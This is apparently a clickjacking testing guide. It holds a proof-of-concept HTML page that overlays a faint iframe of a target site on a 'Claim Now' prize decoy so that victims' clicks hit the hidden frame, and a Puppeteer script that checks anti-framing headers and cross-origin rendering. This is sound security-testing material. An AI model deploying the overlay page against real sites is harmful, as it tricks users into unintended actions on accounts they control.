Testing for Clickjacking Vulnerabilities

Testing for Clickjacking Vulnerabilities

Manual testing approach (a proof-of-concept page; replace `target-site.com` with the page that holds the sensitive control, and only run it against targets you are authorized to test):

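<!DOCTYPE html>
<!--
  Clickjacking proof-of-concept page.

  Only use this against a target you are authorized to test, and point the
  iframe at the page holding the control you want the victim to click.

  The framed page must sit ABOVE the decoy (higher z-index) at reduced
  opacity: the victim believes they are pressing "Claim Now", but the click
  lands on the invisible frame. With the decoy on top (as in a naive layout)
  the click hits the decoy button and nothing is hijacked. Keep opacity at
  0.5 while aligning the decoy with the target's control, then lower it
  towards 0 for the final demonstration.
-->
<html>
<head>
    <meta charset="utf-8">
    <title>Clickjacking Test</title>
    <style>
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: 0;
            /* Semi-transparent frame on top receives the victim's clicks. */
            opacity: 0.5;
            z-index: 2;
        }
        .decoy {
            position: absolute;
            /* Adjust top/left so the target's control overlaps "Claim Now". */
            top: 100px;
            left: 100px;
            /* Visible bait rendered beneath the frame. */
            z-index: 1;
            background: white;
            padding: 20px;
            border: 1px solid black;
        }
    </style>
</head>
<body>
    <iframe src="https://target-site.com"></iframe>
    <div class="decoy">
        <h2>Click here for free prize!</h2>
        <button>Claim Now</button>
    </div>
</body>
</html>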

Automated testing script (Puppeteer; reports both the anti-framing response headers — `X-Frame-Options` and CSP `frame-ancestors` — and whether the page actually rendered inside a cross-origin frame):

const puppeteer = require('puppeteer');

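/**
 * Classify a response's anti-framing headers.
 *
 * Modern browsers honour CSP `frame-ancestors` in preference to
 * `X-Frame-Options` when both are present, and they ignore the obsolete
 * `X-Frame-Options: ALLOW-FROM`, so a header check has to look at both.
 *
 * @param {Record<string, string>} headers - response headers with lower-cased
 *   names (the shape Puppeteer's `response.headers()` returns).
 * @returns {{frameable: boolean, reason: string, xFrameOptions: (string|null), frameAncestors: (string|null)}}
 *   `frameable` is true when nothing in the headers would stop a cross-origin
 *   page from embedding the response.
 */
function assessFramingHeaders(headers) {
    const rawXfo = headers['x-frame-options'];
    const xFrameOptions = typeof rawXfo === 'string' && rawXfo.trim() !== ''
        ? rawXfo.trim()
        : null;
    const csp = typeof headers['content-security-policy'] === 'string'
        ? headers['content-security-policy']
        : '';

    // Directives are ';'-separated; duplicate CSP headers may have been joined
    // with newlines, so split on those too. Only the first frame-ancestors
    // directive counts (browsers ignore later duplicates).
    const frameAncestors = csp
        .split(/[;\n]/)
        .map((directive) => directive.trim())
        .find((directive) => /^frame-ancestors(\s|$)/i.test(directive));

    if (frameAncestors !== undefined) {
        const sources = frameAncestors.split(/\s+/).slice(1).map((s) => s.toLowerCase());
        // '*' or a bare scheme lets any origin frame the page; an empty source
        // list behaves like 'none'.
        const permissive = sources.some((s) => s === '*' || s === 'http:' || s === 'https:');
        return {
            frameable: permissive,
            reason: `CSP ${frameAncestors}`,
            xFrameOptions,
            frameAncestors,
        };
    }

    const xfo = xFrameOptions === null ? '' : xFrameOptions.toUpperCase();
    if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
        return { frameable: false, reason: `X-Frame-Options ${xfo}`, xFrameOptions, frameAncestors: null };
    }
    if (xfo.startsWith('ALLOW-FROM')) {
        return {
            frameable: true,
            reason: 'X-Frame-Options ALLOW-FROM is ignored by modern browsers',
            xFrameOptions,
            frameAncestors: null,
        };
    }
    if (xfo !== '') {
        return {
            frameable: true,
            reason: `unrecognised X-Frame-Options value "${xFrameOptions}"`,
            xFrameOptions,
            frameAncestors: null,
        };
    }
    return { frameable: true, reason: 'no anti-framing header', xFrameOptions: null, frameAncestors: null };
}

/**
 * Check whether `url` can be embedded in a cross-origin iframe.
 *
 * Two signals are logged: the anti-framing response headers (authoritative for
 * modern browsers) and whether Chromium actually rendered the page inside a
 * frame hosted on a foreign origin. Only run this against targets you are
 * authorized to test. Headers are per-response: a protected landing page says
 * nothing about other paths of the same site, so test the sensitive pages.
 *
 * @param {string} url - absolute http(s) URL of the page to test.
 * @returns {Promise<void>} resolves after the findings have been logged.
 * @throws {TypeError} if `url` is not a valid URL.
 * @throws {Error} if the navigation yields no response.
 */
async function testClickjackingProtection(url) {
    // Validate and normalise first so a bad URL fails before a browser is
    // launched. The normalised href also has '"' percent-encoded, so it can be
    // interpolated into the iframe markup below without breaking the attribute.
    const target = new URL(url).href;
    const browser = await puppeteer.launch();
    try {
        const page = await browser.newPage();

        // 1. Headers. Load the page directly; Puppeteer lower-cases header names.
        const response = await page.goto(target);
        if (response === null) {
            throw new Error(`No response received for ${target}`);
        }
        const verdict = assessFramingHeaders(response.headers());
        console.log('X-Frame-Options:', verdict.xFrameOptions === null ? 'Not set' : verdict.xFrameOptions);
        console.log('CSP frame-ancestors:', verdict.frameAncestors === null ? 'Not set' : verdict.frameAncestors);
        console.log(`${target} frameable per headers: ${verdict.frameable} (${verdict.reason})`);

        // 2. Behaviour. Host the iframe on a page that is not the target's origin
        //    (setContent yields an about:blank document), so SAMEORIGIN / 'self'
        //    are exercised the way a third-party attacker page would exercise them.
        await page.setContent(`<iframe src="${target}" style="width:100%;height:600px;"></iframe>`);
        // page.waitForTimeout was removed in Puppeteer 22; a plain timer is portable.
        await new Promise((resolve) => setTimeout(resolve, 3000));

        // From page scripts, a cross-origin iframe's contentDocument is always
        // null and does not throw, so checking it reports "not frameable" for
        // every cross-origin target. CDP can inspect the child frame directly.
        const child = page.frames().find((frame) => frame !== page.mainFrame());
        let framedHref = null;
        if (child !== undefined) {
            try {
                framedHref = await child.evaluate(() => document.location.href);
            } catch (err) {
                // Frame was torn down or never produced a document: not rendered.
                framedHref = null;
            }
        }
        // A blocked frame lands on a browser error document rather than an
        // http(s) URL — confirm this against your Chromium build before relying
        // on it alone; the header verdict above is the authoritative signal.
        const rendered = framedHref !== null && /^https?:/i.test(framedHref);
        console.log(`${target} rendered inside a cross-origin frame: ${rendered}`);
    } finally {
        await browser.close();
    }
}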

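// Target comes from the command line (`node script.js https://host/sensitive-page`),
// falling back to the original example URL. The promise is no longer left
// floating: a failure is printed and the exit code set so CI notices it.
const target = process.argv[2] !== undefined && process.argv[2] !== ''
    ? process.argv[2]
    : 'https://example.com';
testClickjackingProtection(target).catch((err) => {
    console.error(err);
    process.exitCode = 1;
});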